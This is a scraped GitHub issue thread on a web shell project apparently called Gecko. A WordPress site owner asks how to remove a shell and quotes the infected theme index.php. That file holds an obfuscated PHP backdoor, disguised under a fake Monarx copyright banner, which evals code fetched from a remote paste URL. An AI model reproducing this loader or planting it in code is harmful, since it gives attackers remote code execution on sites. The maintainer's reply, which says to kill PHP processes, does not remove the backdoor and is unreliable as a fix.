Gecko icon indicating copy to clipboard operation
Gecko copied to clipboard

Published 20 hours ago verified publisher icon MadExploits

How to remove shell completely.

Open cyberwizard-dev opened this issue 2 years ago • 2 comments

how do i remove this exploit from my wordpress site?? a url on my wordpress site, returns the shell interface... the index.php of my theme contains this,

<?php /**========================================================= ___ ___ | \/ | Copyright (C) 2017-2023, Monarx, Inc. | . . | ___ _ __ __ _ _ __ __ __ | |\/| | / _ \ | '_ \ / _ || '|\ / / | | | || () || | | || (| || | > < _| |_/ _/ || || _,||| //_\

=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://paste.gg/p/anonymous/939acf9280bd4a91b28c4a44f1145fa0/files/6c0c885f48084798b8c13a761d24ffa7/raw"));/**/?>

Hack I found on fatiu’s website`

cyberwizard-dev avatar Aug 07 '23 15:08 cyberwizard-dev

write killall -9 php or pkill -9 php on gecko terminal

MadExploits avatar Aug 14 '23 11:08 MadExploits

Thanks.

On Mon, 14 Aug 2023, 12:30 pm MrMad, @.***> wrote:

write killall -9 php or pkill -9 php on gecko terminal

— Reply to this email directly, view it on GitHub https://github.com/MadExploits/Gecko/issues/5#issuecomment-1677151530, or unsubscribe https://github.com/notifications/unsubscribe-auth/AMVNRQQEWSRTVFIPVB3DVATXVID67ANCNFSM6AAAAAA3HFOXRQ . You are receiving this because you authored the thread.Message ID: @.***>

cyberwizard-dev avatar Aug 14 '23 12:08 cyberwizard-dev